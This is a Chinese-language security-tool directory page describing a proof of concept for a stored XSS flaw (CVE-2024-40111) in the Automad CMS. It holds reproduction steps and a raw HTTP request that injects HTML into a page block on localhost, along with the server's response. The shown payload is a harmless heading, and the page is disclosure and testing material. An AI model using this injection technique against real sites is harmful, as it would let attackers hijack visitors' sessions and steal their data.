Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-40111-Exploit — 针对 CVE-2024-40111 的漏洞利用:Automad 2.0.0-alpha.4 中的存储型跨站脚本(XSS)漏洞 | Kitploit
工具/GitHubGitHub/theexploiters/cve-2024-40111-exploit
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubtheexploiters/cve-2024-40111-exploit

CVE-2024-40111-Exploit

针对 CVE-2024-40111 的漏洞利用:Automad 2.0.0-alpha.4 中的存储型跨站脚本(XSS)漏洞

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-40111:Automad 2.0.0-alpha.4 中的存储型跨站脚本(XSS)漏洞

漏洞详情

  • 漏洞标题:Automad 2.0.0-alpha.4 中的存储型跨站脚本(XSS)漏洞
  • 日期:2024-06-20
  • 漏洞作者:Jerry Thomas (w3bn00b3r)
  • 厂商主页:Automad
  • 软件链接:Automad GitHub 仓库
  • 类别:Web 应用 [平面文件 CMS]
  • 版本:2.0.0-alpha.4
  • 测试环境:Docker 版本 26.1.4,Debian GNU/Linux 11 (bullseye)

描述

在 Automad 2.0.0-alpha.4 中发现了一个持久性(存储型)跨站脚本(XSS)漏洞。该漏洞允许攻击者将恶意 JavaScript 代码注入模板主体,并存储在 CMS 中。注入的代码会在任何访问受影响页面的用户浏览器中执行,可能导致会话劫持、数据窃取和其他恶意活动。

概念验证

复现步骤

  1. 登录:以管理员身份登录,并导航至端点 http://localhost/dashboard/home。

  2. 编辑欢迎页面:编辑默认的欢迎页面。

  3. 导航至内容选项卡:前往 http://localhost/dashboard/page?url=%2F&section=text,并编辑名为 的区块。

Main
  • 注入载荷:输入以下 XSS 载荷:

    root@kitploit:~
  • 请求

    root@kitploit:~
    POST /_api/page/data HTTP/1.1
    Host: localhost
    Content-Length: 1822
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Accept: */*
    Origin: http://localhost
    Referer: http://localhost/dashboard/page?url=%2F&section=text
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
    Connection: close
    
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Content-Disposition: form-data; name="__csrf__"
    
    49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Content-Disposition: form-data; name="__json__"
    
    {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv--
    

    响应

    root@kitploit:~
    HTTP/1.1 200 OK
    Server: nginx/1.24.0
    Date: Thu, 20 Jun 2024 19:17:35 GMT
    Content-Type: application/json; charset=utf-8
    Connection: close
    X-Powered-By: PHP/8.3.6
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 30
    
    {"code":200,"time":1718911055}
    
    1. 触发 XSS:访问首页 http://localhost/ 时,XSS 载荷被触发。

    Repo View Counter

    下载工具